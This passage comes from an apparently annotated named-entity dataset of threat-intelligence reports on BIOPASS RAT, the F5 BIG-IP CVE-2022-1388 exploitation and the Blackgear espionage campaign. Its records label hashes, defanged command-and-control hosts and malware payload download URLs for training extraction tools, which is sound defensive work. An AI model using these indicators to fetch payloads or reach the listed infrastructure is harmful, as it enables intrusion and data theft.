fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851","entities":[{"id":10318,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3426,"text":"test4.exe BIOPASS RAT Loader ","entities":[{"id":10319,"label":"malware","start_offset":11,"end_offset":22},{"id":49119,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":3427,"text":"Backdoor.","entities":[],"relations":[],"Comments":[]} {"id":3428,"text":"Win64.BIOPASS.A","entities":[{"id":49120,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3429,"text":" fb812a2ccdab0a9703e8e4e12c479ff809a72899374c1abf06aef55abbbf8edc","entities":[{"id":10320,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3430,"text":"flash_installer.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10321,"label":"malware","start_offset":21,"end_offset":32},{"id":49121,"label":"FILEPATH","start_offset":0,"end_offset":19}],"relations":[],"Comments":[]} {"id":3431,"text":"Win64.BIOPASS.A","entities":[{"id":49122,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3432,"text":" ee2e9a1d3b593fd464f885b734d469d047cdb1bc879e568e7c33d786e8d1e8e2","entities":[{"id":10322,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3433,"text":"aos.exe BIOPASS RAT binary (PyInstaller) Trojan.Win32.BIOPASS.A afbfe16cbdd574d64c24ad97810b04db509505522e5bb7b9ca3b497efc731045 socketio.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 0b9f605926df4ff190ddc6c11e0f5839bffe431a3ddfd90acde1fcd2f91dada3 socketio.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 6fc307063c376b8be2d3a9545959e068884d9cf7f819b176adf676fc4addef7d flash_ins_bak.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 7249ad971283e164b0489110c23f4e40c64ee49b49bcc5cd0d32d9e701ec2114 files.zip BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A de17e583a4d112ce513efd4b7cb575d272dcceef229f81360ebdfa5a1e083f11 fn.exe BIOPASS RAT binary (Nuitka) Trojan","entities":[{"id":10324,"label":"SHA2","start_offset":67,"end_offset":131},{"id":10330,"label":"SHA2","start_offset":471,"end_offset":535},{"id":10332,"label":"SHA2","start_offset":601,"end_offset":665},{"id":10326,"label":"SHA2","start_offset":200,"end_offset":264},{"id":10328,"label":"SHA2","start_offset":333,"end_offset":397},{"id":49123,"label":"FILEPATH","start_offset":0,"end_offset":7},{"id":49129,"label":"malware","start_offset":280,"end_offset":307},{"id":49132,"label":"FILEPATH","start_offset":667,"end_offset":673},{"id":49135,"label":"malware","start_offset":147,"end_offset":174},{"id":49136,"label":"malware","start_offset":418,"end_offset":445},{"id":49124,"label":"malware","start_offset":43,"end_offset":65},{"id":49125,"label":"FILEPATH","start_offset":133,"end_offset":145},{"id":49126,"label":"malware","start_offset":176,"end_offset":198},{"id":49127,"label":"FILEPATH","start_offset":266,"end_offset":278},{"id":49128,"label":"malware","start_offset":309,"end_offset":331},{"id":49130,"label":"FILEPATH","start_offset":399,"end_offset":416},{"id":49131,"label":"FILEPATH","start_offset":537,"end_offset":546},{"id":49133,"label":"malware","start_offset":577,"end_offset":599},{"id":49134,"label":"malware","start_offset":9,"end_offset":41},{"id":49137,"label":"malware","start_offset":447,"end_offset":469},{"id":49138,"label":"malware","start_offset":548,"end_offset":575},{"id":49139,"label":"malware","start_offset":675,"end_offset":710}],"relations":[{"id":729,"from_id":49123,"to_id":49124,"type":"indicates"},{"id":730,"from_id":49134,"to_id":49124,"type":"duplicate-of"},{"id":731,"from_id":10324,"to_id":49124,"type":"indicates"},{"id":732,"from_id":49125,"to_id":49124,"type":"indicates"},{"id":733,"from_id":49135,"to_id":49126,"type":"duplicate-of"},{"id":734,"from_id":10326,"to_id":49126,"type":"indicates"},{"id":735,"from_id":49127,"to_id":49126,"type":"indicates"},{"id":736,"from_id":49127,"to_id":10326,"type":"duplicate-of"},{"id":737,"from_id":49129,"to_id":49128,"type":"duplicate-of"},{"id":738,"from_id":10328,"to_id":49128,"type":"indicates"},{"id":739,"from_id":49130,"to_id":49128,"type":"indicates"},{"id":740,"from_id":49130,"to_id":10328,"type":"duplicate-of"},{"id":741,"from_id":49136,"to_id":49137,"type":"duplicate-of"},{"id":742,"from_id":49131,"to_id":10330,"type":"duplicate-of"},{"id":743,"from_id":49131,"to_id":49137,"type":"indicates"},{"id":744,"from_id":10330,"to_id":49137,"type":"indicates"},{"id":745,"from_id":49138,"to_id":49133,"type":"duplicate-of"},{"id":746,"from_id":49139,"to_id":49133,"type":"duplicate-of"},{"id":747,"from_id":49132,"to_id":10332,"type":"duplicate-of"},{"id":748,"from_id":49132,"to_id":49133,"type":"indicates"},{"id":749,"from_id":10332,"to_id":49133,"type":"indicates"}],"Comments":[]} {"id":3434,"text":".Win32.BIOPASS.A 17e43d31585b4c3ac6bf724bd7263761af75a59335b285b045fce597b3825ed0","entities":[{"id":10334,"label":"SHA2","start_offset":18,"end_offset":82},{"id":49140,"label":"malware","start_offset":1,"end_offset":16}],"relations":[],"Comments":[]} {"id":3435,"text":"systemsetting.exe BIOPASS RAT binary (PyInstaller) Trojan.Win32.BIOPASS.A b3bd28951789ef7cfaf659e07e198b45b04a2f3cde268e6ede4d4f877959341e systemsetting.exe BIOPASS RAT binary (PyInstaller) Trojan.Win32.BIOPASS.A e0caebfbd2804fcde30e75f2c6d06e84b3bf89ed85db34d6f628b25dca7a9a0f YIZHI_SIGNED.exe BIOPASS RAT binary (PyInstaller) Trojan.Win32.BIOPASS.A 2503549352527cb0ffa1811a44481f6980961d98f9d5a96d5926d5676c31b9ee socketio.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 8ba72a391fb653b2cc1e5caa6f927efdf46568638bb4fc25e6f01dc36a96533b flashplayerpp_install_cn.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A e5fdb754c1a7c36c288c46765c9258bb2c7f38fa2a99188a623182f877da3783 beep.sys Derusbi Trojan.Win64.DERUSBI.C a7e9e2bec3ad283a9a0b130034e822c8b6dfd26dda855f883a3a4ff785514f97 Browser_plugin (8).exe Cobalt Strike Loader Trojan.Win64.COBEACON.SUX IP\/Domain\/URL Note webplus-cn-hongkong-s-5faf81e0d937f14c9ddbe5a0[.]oss-cn-hongkong[.]aliyuncs[.]com Cloud storage bucket used to host BIOPASS RAT loaders softres[.]oss-accelerate[.]aliyuncs[.]com Cloud storage bucket used to host BIOPASS RAT loaders flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com Cloud storage bucket used to host BIOPASS RAT modules and stolen data lualibs[.]oss-cn-hongkong[.]aliyuncs[.]com Cloud storage bucket used to host Cobalt Strike loader scripts bps-rhk[.]oss-cn-hongkong[.]aliyuncs[.]com Cloud storage bucket used for RTMP live streaming wxdget[.]oss-cn-hongkong[.]aliyuncs[.]com Cloud storage bucket used for storing stolen WeChat data chinanode[.]microsoft-update-service[.]com:38080 BIOPASS RAT C&C server 0x3s[.]com XSS attack domain update[.]flash-installer[.]com Associated fake installer domain update[.]flash-installers[.]com Associated fake installer domain flash[.]com[.]cm Associated fake installer domain flash[.]com[.]se Associated fake installer domain flashi[.]com[.]cn Associated fake installer domain flash[.]co[.]cm Associated fake installer domain 47[.]57[.]142[.]30 Cobalt Strike C&C server 47[.]57[.]186[.]151 Cobalt Strike C&C server 103[.]158[.]190[.]58 Cobalt Strike C&C server 207[.]148[.]100[.]49 Cobalt Strike C&C server microsoft[.]update[.]flash[.]com.se Cobalt Strike C&C server hxxps:\/\/webplus-cn-hongkong-s-5faf81e0d937f14c9ddbe5a0[.]oss-cn-hongkong.aliyuncs[.]com\/Silverlight_ins.exe BIOPASS RAT loader download URL hxxps:\/\/webplus-cn-hongkong-s-5faf81e0d937f14c9ddbe5a0.oss-cn-hongkong.aliyuncs[.]com\/flash_ins[.]exe BIOPASS RAT loader download URL hxxp:\/\/softres.oss-accelerate[.]aliyuncs[.]com\/Silverlight[.]exe BIOPASS RAT loader download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/big.txt BIOPASS RAT script download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/Online.txt BIOPASS RAT script download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/files.zip Python runtime package download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/ServiceHub.zip Python runtime package download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/c1222.txt c1222 module script download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/cdaemon.txt cdaemon module download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/x.txt Cobalt Strike Python loader download URL hxxp:\/\/lualibs.oss-cn-hongkong[.]aliyuncs.com\/x86\/1-CS-443.lua Cobalt Strike Lua loader download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/s.txt Cobalt Strike shellcode download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/sc2.txt Cobalt Strike shellcode download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/sc3.txt Cobalt Strike shellcode download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/csplugins\/getwechatdb.txt getwechatdb plug-in download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/csplugins\/wechat.txt getwechatdb plug-in download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/csplugins\/xss_spoof.zip xss_spoof plug-in download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/csplugins\/xss.txt XSS payload download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/csplugins\/script.txt XSS payload download URL hxxp:\/\/0x3s[.]com\/x[.]js XSS injection URL Tags Malware | Endpoints | APT & Targeted Attacks | Research | Articles, News, Reports","entities":[{"id":10335,"label":"malware","start_offset":19,"end_offset":30},{"id":10337,"label":"malware","start_offset":162,"end_offset":173},{"id":10338,"label":"SHA2","start_offset":220,"end_offset":284},{"id":10339,"label":"malware","start_offset":315,"end_offset":326},{"id":10341,"label":"malware","start_offset":453,"end_offset":464},{"id":10343,"label":"malware","start_offset":602,"end_offset":613},{"id":10344,"label":"MD5","start_offset":655,"end_offset":719},{"id":10346,"label":"SHA2","start_offset":764,"end_offset":828},{"id":10350,"label":"malware","start_offset":1047,"end_offset":1058},{"id":10353,"label":"malware","start_offset":1145,"end_offset":1156},{"id":10356,"label":"malware","start_offset":1256,"end_offset":1267},{"id":10336,"label":"SHA2","start_offset":77,"end_offset":141},{"id":10345,"label":"malware","start_offset":731,"end_offset":738},{"id":10340,"label":"SHA2","start_offset":373,"end_offset":437},{"id":10342,"label":"SHA2","start_offset":506,"end_offset":570},{"id":10360,"label":"tools","start_offset":1371,"end_offset":1384},{"id":10347,"label":"tools","start_offset":854,"end_offset":867},{"id":10363,"label":"malware","start_offset":1648,"end_offset":1659},{"id":10365,"label":"IPV4","start_offset":2044,"end_offset":2062},{"id":10367,"label":"IPV4","start_offset":2090,"end_offset":2109},{"id":10369,"label":"IPV4","start_offset":2137,"end_offset":2157},{"id":10371,"label":"IPV4","start_offset":2185,"end_offset":2205},{"id":10374,"label":"tools","start_offset":2270,"end_offset":2283},{"id":10375,"label":"malware","start_offset":2405,"end_offset":2416},{"id":10376,"label":"malware","start_offset":2541,"end_offset":2552},{"id":10377,"label":"malware","start_offset":2640,"end_offset":2651},{"id":10378,"label":"malware","start_offset":2746,"end_offset":2757},{"id":10379,"label":"malware","start_offset":2855,"end_offset":2866},{"id":10380,"label":"tools","start_offset":3403,"end_offset":3416},{"id":10386,"label":"attack-pattern","start_offset":4328,"end_offset":4331},{"id":10387,"label":"attack-pattern","start_offset":4440,"end_offset":4443},{"id":10388,"label":"attack-pattern","start_offset":4492,"end_offset":4495},{"id":10382,"label":"tools","start_offset":3509,"end_offset":3522},{"id":10383,"label":"tools","start_offset":3619,"end_offset":3632},{"id":10384,"label":"tools","start_offset":3730,"end_offset":3743},{"id":10385,"label":"tools","start_offset":3841,"end_offset":3854},{"id":10370,"label":"tools","start_offset":2159,"end_offset":2172},{"id":10368,"label":"tools","start_offset":2111,"end_offset":2124},{"id":10372,"label":"tools","start_offset":2207,"end_offset":2220},{"id":10366,"label":"tools","start_offset":2064,"end_offset":2077},{"id":49152,"label":"malware","start_offset":482,"end_offset":504},{"id":49159,"label":"DOMAIN","start_offset":1293,"end_offset":1335},{"id":49166,"label":"DOMAIN","start_offset":1703,"end_offset":1733},{"id":49172,"label":"DOMAIN","start_offset":2233,"end_offset":2268},{"id":49141,"label":"FILEPATH","start_offset":0,"end_offset":17},{"id":49147,"label":"FILEPATH","start_offset":721,"end_offset":729},{"id":49148,"label":"FILEPATH","start_offset":830,"end_offset":852},{"id":49149,"label":"attack-pattern","start_offset":1684,"end_offset":1694},{"id":49150,"label":"malware","start_offset":196,"end_offset":218},{"id":49153,"label":"malware","start_offset":631,"end_offset":653},{"id":49154,"label":"malware","start_offset":740,"end_offset":762},{"id":49156,"label":"DOMAIN","start_offset":930,"end_offset":1011},{"id":49142,"label":"malware","start_offset":53,"end_offset":75},{"id":49151,"label":"malware","start_offset":349,"end_offset":371},{"id":49155,"label":"malware","start_offset":876,"end_offset":901},{"id":49162,"label":"DOMAIN","start_offset":1497,"end_offset":1538},{"id":49169,"label":"DOMAIN","start_offset":1888,"end_offset":1904},{"id":49170,"label":"DOMAIN","start_offset":1940,"end_offset":1957},{"id":49171,"label":"DOMAIN","start_offset":1993,"end_offset":2008},{"id":49143,"label":"FILEPATH","start_offset":143,"end_offset":160},{"id":49144,"label":"FILEPATH","start_offset":297,"end_offset":313},{"id":49145,"label":"FILEPATH","start_offset":439,"end_offset":451},{"id":49146,"label":"FILEPATH","start_offset":572,"end_offset":600},{"id":49157,"label":"DOMAIN","start_offset":1059,"end_offset":1109},{"id":49158,"label":"DOMAIN","start_offset":1166,"end_offset":1220},{"id":49160,"label":"DOMAIN","start_offset":1401,"end_offset":1443},{"id":49161,"label":"DOMAIN","start_offset":1497,"end_offset":1538},{"id":49189,"label":"DOMAIN","start_offset":4124,"end_offset":4211},{"id":49191,"label":"DOMAIN","start_offset":4354,"end_offset":4438},{"id":49163,"label":"DOMAIN","start_offset":1598,"end_offset":1646},{"id":49164,"label":"DOMAIN","start_offset":1672,"end_offset":1682},{"id":49165,"label":"DOMAIN","start_offset":1497,"end_offset":1538},{"id":49167,"label":"DOMAIN","start_offset":1836,"end_offset":1852},{"id":49168,"label":"DOMAIN","start_offset":1769,"end_offset":1800},{"id":49174,"label":"DOMAIN","start_offset":2438,"end_offset":2539},{"id":49175,"label":"DOMAIN","start_offset":2574,"end_offset":2638},{"id":49176,"label":"DOMAIN","start_offset":2673,"end_offset":2744},{"id":49178,"label":"DOMAIN","start_offset":2888,"end_offset":2961},{"id":49179,"label":"DOMAIN","start_offset":3000,"end_offset":3078},{"id":49181,"label":"DOMAIN","start_offset":3226,"end_offset":3301},{"id":49184,"label":"DOMAIN","start_offset":3548,"end_offset":3617},{"id":49188,"label":"DOMAIN","start_offset":4004,"end_offset":4088},{"id":49192,"label":"DOMAIN","start_offset":4466,"end_offset":4490},{"id":49173,"label":"DOMAIN","start_offset":2296,"end_offset":2403},{"id":49177,"label":"DOMAIN","start_offset":2779,"end_offset":2853},{"id":49180,"label":"DOMAIN","start_offset":3117,"end_offset":3190},{"id":49182,"label":"DOMAIN","start_offset":3332,"end_offset":3401},{"id":49183,"label":"DOMAIN","start_offset":3445,"end_offset":3507},{"id":49185,"label":"DOMAIN","start_offset":3657,"end_offset":3728},{"id":49186,"label":"DOMAIN","start_offset":3768,"end_offset":3839},{"id":49190,"label":"DOMAIN","start_offset":4245,"end_offset":4326},{"id":49187,"label":"DOMAIN","start_offset":3879,"end_offset":3968}],"relations":[],"Comments":[]} {"id":3436,"text":"This post is also available in: 日本語 (Japanese) On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControlREST component of its BIG-IP product tracked in CVE-2022-1388.","entities":[{"id":49195,"label":"vulnerability","start_offset":206,"end_offset":219},{"id":49196,"label":"vulnerability","start_offset":107,"end_offset":142},{"id":49193,"label":"TIME","start_offset":53,"end_offset":67},{"id":49194,"label":"identity","start_offset":69,"end_offset":71},{"id":49197,"label":"tools","start_offset":150,"end_offset":162}],"relations":[{"id":750,"from_id":49196,"to_id":49195,"type":"duplicate-of"},{"id":751,"from_id":49197,"to_id":49195,"type":"has"}],"Comments":[]} {"id":3437,"text":"Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems.","entities":[{"id":49198,"label":"attack-pattern","start_offset":48,"end_offset":69},{"id":49200,"label":"vulnerability","start_offset":26,"end_offset":44},{"id":49199,"label":"attack-pattern","start_offset":74,"end_offset":113}],"relations":[{"id":752,"from_id":49198,"to_id":49200,"type":"targets"},{"id":753,"from_id":49199,"to_id":49200,"type":"targets"}],"Comments":[]} {"id":3438,"text":"This is a critical vulnerability that needs immediate attention, as it was given a 9.8 CVSS score.","entities":[],"relations":[],"Comments":[]} {"id":3439,"text":"Since the release of this advisory, mass scanning activity has started to occur, seeking unpatched systems, and in-the-wild exploitation has begun. Palo Alto Networks released a Threat Prevention signature for the F5 BIG-IP Authentication Bypass Vulnerability (92570) and within just 10 hours, the signature triggered 2,552 times due to vulnerability scanning and active exploitation attempts.","entities":[{"id":49201,"label":"identity","start_offset":149,"end_offset":168},{"id":49203,"label":"vulnerability","start_offset":225,"end_offset":268},{"id":49204,"label":"TIME","start_offset":285,"end_offset":293},{"id":49202,"label":"tools","start_offset":215,"end_offset":224}],"relations":[{"id":754,"from_id":49202,"to_id":49203,"type":"has"}],"Comments":[]} {"id":3440,"text":" Unit 42 recommends customers upgrade to the latest release of F5 BIG-IP products.","entities":[{"id":10409,"label":"identity","start_offset":2,"end_offset":9},{"id":49205,"label":"tools","start_offset":64,"end_offset":73}],"relations":[],"Comments":[]} {"id":3441,"text":"Palo Alto Networks Next Generation Firewall Threat Prevention customers are protected with Signature 92570.","entities":[{"id":49206,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} {"id":3442,"text":" Vulnerable Systems Mitigation Actions Observed in the Wild Conclusion Additional Resources Indicators of Compromise The F5 product vulnerable to CVE-2022-1388 is BIG-IP with the following versions: The vulnerability exists within the iControl REST framework used by BIG-IP.","entities":[{"id":49208,"label":"vulnerability","start_offset":201,"end_offset":218},{"id":49209,"label":"tools","start_offset":118,"end_offset":132},{"id":49207,"label":"vulnerability","start_offset":146,"end_offset":160},{"id":49210,"label":"tools","start_offset":237,"end_offset":260}],"relations":[{"id":755,"from_id":49208,"to_id":49207,"type":"duplicate-of"},{"id":756,"from_id":49209,"to_id":49207,"type":"has"},{"id":757,"from_id":49210,"to_id":49208,"type":"has"}],"Comments":[]} {"id":3443,"text":" We recommend that customers update their F5 BIG-IP deployments to one of the following versions that have patches to mitigate CVE-2022-1388:","entities":[{"id":49212,"label":"tools","start_offset":42,"end_offset":51},{"id":49211,"label":"vulnerability","start_offset":127,"end_offset":140}],"relations":[{"id":758,"from_id":49212,"to_id":49211,"type":"has"}],"Comments":[]} {"id":3444,"text":" Until you can install the patched versions of BIG-IP, see the Mitigation section on the F5 security advisory for information on how to mitigate this vulnerability via a workaround to limit the vulnerable component to trusted networks. In response to the F5 security advisory, Palo Alto Networks released the Threat Prevention signature F5 BIG-IP Authentication Bypass Vulnerability (92570) on May 9.","entities":[{"id":49218,"label":"TIME","start_offset":395,"end_offset":400},{"id":49213,"label":"tools","start_offset":47,"end_offset":53},{"id":49215,"label":"identity","start_offset":256,"end_offset":258},{"id":49216,"label":"identity","start_offset":278,"end_offset":296},{"id":49217,"label":"vulnerability","start_offset":338,"end_offset":391},{"id":49214,"label":"identity","start_offset":89,"end_offset":91}],"relations":[],"Comments":[]} {"id":3445,"text":" We observed this signature triggered 2,552 times between 4:47 and 14:00 UTC on May 10.","entities":[{"id":49219,"label":"TIME","start_offset":50,"end_offset":86}],"relations":[],"Comments":[]} {"id":3446,"text":"We were able to analyze 2,151 packets that triggered the signature and observed both vulnerability scanning activity and active exploitation attempts.","entities":[],"relations":[],"Comments":[]} {"id":3447,"text":" Table 1 shows the commands that would be executed in the event of successful exploitation.","entities":[],"relations":[],"Comments":[]} {"id":3448,"text":"These were found by analysis of the packet captures that triggered the F5 BIG-IP Authentication Bypass Vulnerability signature.","entities":[{"id":49220,"label":"vulnerability","start_offset":81,"end_offset":116},{"id":49221,"label":"tools","start_offset":71,"end_offset":80}],"relations":[{"id":759,"from_id":49221,"to_id":49220,"type":"has"}],"Comments":[]} {"id":3449,"text":" Table 1. Commands observed in CVE-2022-1388 exploitation attempts.","entities":[{"id":49222,"label":"vulnerability","start_offset":31,"end_offset":44}],"relations":[],"Comments":[]} {"id":3450,"text":" Palo Alto Networks customers receive protections against the exploitation of this vulnerability in the following ways: Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.","entities":[{"id":49223,"label":"identity","start_offset":1,"end_offset":19},{"id":49224,"label":"identity","start_offset":121,"end_offset":139}],"relations":[],"Comments":[]} {"id":3451,"text":" K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388 EnemyBot Attempts to Exploit CVE-2022-1388 30f7e1998d162dfad69d6d8abb763ae4033bbd4a015d170b1ad3e20d39cd4e20 da647646cd36a3acb716b4266e9032f9c1caf555b7667e1dbe5bef89e7d2fdbb b39d2a1202351d3be5d9906ec47ee05c305302124dddec5538dc7b9924c6b85d ad6d44c70f83431bedf890967f2da0607c9b1f79591fb1b2697160f5b1c1a75c 1f93a6696f7bf1b2067cc503583deb4840404ebeeba89579bd303f57000baeb7 9a72aab2a3d1d6e66c185966597a52a8726ca25f5d9e2195af44f98d8b1847d5 53214f4d2d2dfd02b46f416cbdcb6f3a764820a50da4d59926f829b96cf82a6c 20.187.67[.]224 192.132.218[.]149 85.203.23[.]73 116.48.110[.]159 hxxps:\/\/transfer[.]sh\/dlxo3I\/1.sh hxxp:\/\/20.239.193[.]47\/kele.sh hxxp:\/\/20.239.193[.]47\/kele1 hxxp:\/\/20.187.86[.]47\/dadda Updated May 16, 2022 Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":10440,"label":"malware","start_offset":61,"end_offset":69},{"id":10442,"label":"SHA2","start_offset":170,"end_offset":234},{"id":10443,"label":"SHA2","start_offset":235,"end_offset":299},{"id":10444,"label":"SHA2","start_offset":300,"end_offset":364},{"id":10446,"label":"SHA2","start_offset":430,"end_offset":494},{"id":10447,"label":"SHA2","start_offset":495,"end_offset":559},{"id":10448,"label":"IPV4","start_offset":561,"end_offset":576},{"id":10449,"label":"IPV4","start_offset":577,"end_offset":594},{"id":10450,"label":"IPV4","start_offset":595,"end_offset":609},{"id":10451,"label":"IPV4","start_offset":610,"end_offset":626},{"id":10441,"label":"SHA2","start_offset":105,"end_offset":169},{"id":10445,"label":"SHA2","start_offset":365,"end_offset":429},{"id":49225,"label":"vulnerability","start_offset":12,"end_offset":60},{"id":49228,"label":"DOMAIN","start_offset":662,"end_offset":692},{"id":49229,"label":"DOMAIN","start_offset":693,"end_offset":721},{"id":49226,"label":"vulnerability","start_offset":90,"end_offset":103},{"id":49230,"label":"DOMAIN","start_offset":722,"end_offset":749},{"id":49231,"label":"TIME","start_offset":759,"end_offset":771},{"id":49227,"label":"DOMAIN","start_offset":628,"end_offset":661}],"relations":[{"id":760,"from_id":10440,"to_id":49226,"type":"exploits"}],"Comments":[]} {"id":3452,"text":" Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} {"id":3453,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":3454,"text":"Blackgear (also known as Topgear and Comnie) is a cyberespionage campaign dating back to 2008, at least based on the Protux backdoor used by its operators.","entities":[{"id":49232,"label":"campaign","start_offset":0,"end_offset":9},{"id":49233,"label":"campaign","start_offset":25,"end_offset":32},{"id":49234,"label":"campaign","start_offset":37,"end_offset":43},{"id":49235,"label":"TIME","start_offset":89,"end_offset":93},{"id":49236,"label":"malware","start_offset":117,"end_offset":132}],"relations":[{"id":761,"from_id":49233,"to_id":49232,"type":"duplicate-of"},{"id":762,"from_id":49234,"to_id":49232,"type":"duplicate-of"}],"Comments":[]} {"id":3456,"text":"In 2016, for instance, we found their campaigns attacking Japanese organizations with various malware tools, notably the Elirks backdoor.","entities":[{"id":49240,"label":"TIME","start_offset":3,"end_offset":7},{"id":49241,"label":"malware","start_offset":121,"end_offset":127}],"relations":[],"Comments":[]} {"id":3457,"text":"Blackgear’s operators are well-organized, developing their own tools, which we observed to have been recently fine-tuned, based on their latest attacks.","entities":[{"id":49242,"label":"threat-actor","start_offset":0,"end_offset":21}],"relations":[],"Comments":[]} {"id":3458,"text":"A notable characteristic of Blackgear is the degree to which its attacks are taken to evade detection, abusing blogging, microblogging, and social media services to hide its command-and-control (C&C) configuration.","entities":[{"id":49244,"label":"attack-pattern","start_offset":86,"end_offset":101},{"id":49247,"label":"attack-pattern","start_offset":165,"end_offset":213},{"id":49248,"label":"attack-pattern","start_offset":103,"end_offset":161},{"id":49243,"label":"threat-actor","start_offset":28,"end_offset":37}],"relations":[{"id":763,"from_id":49243,"to_id":49244,"type":"uses"},{"id":765,"from_id":49243,"to_id":49247,"type":"uses"},{"id":766,"from_id":49243,"to_id":49248,"type":"uses"}],"Comments":[]} {"id":3459,"text":"Compared to when C&C information is embedded within the malware, where it’s preset and can thus be easily blocked, this tactic lets Blackgear’s operators to quickly change C&C servers as needed.","entities":[{"id":49249,"label":"threat-actor","start_offset":132,"end_offset":141}],"relations":[],"Comments":[]} {"id":3460,"text":"It can, in turn, prolong the campaign’s foothold in the system and enable attackers to carry out further lateral movement.","entities":[{"id":49250,"label":"attack-pattern","start_offset":105,"end_offset":121}],"relations":[],"Comments":[]} {"id":3461,"text":"Analyzing the Marade downloader (detected by Trend Micro as TSPY_MARADE.ZTBC) and the version of Protux (BKDR_PROTUX.ZTBC) employed by Blackgear’s latest campaigns, we found their encrypted configurations on blog and social media posts (see Figure 1).","entities":[{"id":49251,"label":"malware","start_offset":14,"end_offset":31},{"id":49252,"label":"identity","start_offset":45,"end_offset":56},{"id":49254,"label":"malware","start_offset":97,"end_offset":122},{"id":49255,"label":"threat-actor","start_offset":135,"end_offset":144},{"id":49253,"label":"malware","start_offset":60,"end_offset":76}],"relations":[{"id":767,"from_id":49253,"to_id":49251,"type":"duplicate-of"},{"id":768,"from_id":49254,"to_id":49251,"type":"based-on"},{"id":769,"from_id":49251,"to_id":49255,"type":"authored-by"}],"Comments":[]} {"id":3462,"text":"This can be an indication that these malware tools were developed by the same group.","entities":[],"relations":[],"Comments":[]} {"id":3463,"text":"Figure 1. Marade’s encrypted configuration on a Facebook post Figure 2. Infection chain of Blackgear’s attack Attack chain","entities":[{"id":49258,"label":"threat-actor","start_offset":91,"end_offset":100},{"id":49256,"label":"malware","start_offset":10,"end_offset":17},{"id":49257,"label":"SOFTWARE","start_offset":48,"end_offset":56}],"relations":[{"id":770,"from_id":49256,"to_id":49257,"type":"uses"}],"Comments":[]} {"id":3464,"text":"To paint a bigger picture of Blackgear’s attacks, we correlated the tools and tactics they used against their targets.","entities":[{"id":49259,"label":"threat-actor","start_offset":29,"end_offset":38}],"relations":[],"Comments":[]} {"id":3465,"text":"Here’s a summary of Blackgear’s latest campaign: Use a decoy document or fake installer file, sent via spam email to lure a potential victim into clicking it.","entities":[{"id":49260,"label":"campaign","start_offset":20,"end_offset":47},{"id":49262,"label":"attack-pattern","start_offset":104,"end_offset":114},{"id":49261,"label":"attack-pattern","start_offset":56,"end_offset":93}],"relations":[{"id":771,"from_id":49260,"to_id":49261,"type":"uses"},{"id":772,"from_id":49260,"to_id":49262,"type":"uses"}],"Comments":[]} {"id":3466,"text":"The decoy document will extract the Marade downloader.","entities":[{"id":49264,"label":"malware","start_offset":36,"end_offset":53},{"id":49265,"label":"attack-pattern","start_offset":4,"end_offset":18}],"relations":[{"id":774,"from_id":49265,"to_id":49264,"type":"delivers"}],"Comments":[]} {"id":3467,"text":"It drops itself in the machine’s Temp folder and increases its file size to over 50MB in order to bypass traditional sandbox solutions.","entities":[],"relations":[],"Comments":[]} {"id":3468,"text":"Marade will check if the infected host can connect to the internet and if it is installed with anti-virus (AV) software.","entities":[{"id":49266,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":3469,"text":"If the affected system can connect online and doesn’t have AV software, Marade will connect to a Blackgear-controlled public blog or social media post to retrieve an encrypted C&C configuration.","entities":[{"id":49269,"label":"Infrastucture","start_offset":118,"end_offset":193},{"id":49267,"label":"malware","start_offset":72,"end_offset":78},{"id":49268,"label":"threat-actor","start_offset":97,"end_offset":106}],"relations":[{"id":775,"from_id":49268,"to_id":49269,"type":"controls"},{"id":776,"from_id":49267,"to_id":49269,"type":"beacons-to"}],"Comments":[]} {"id":3470,"text":"Otherwise, Marade will use the C&C information embedded in its 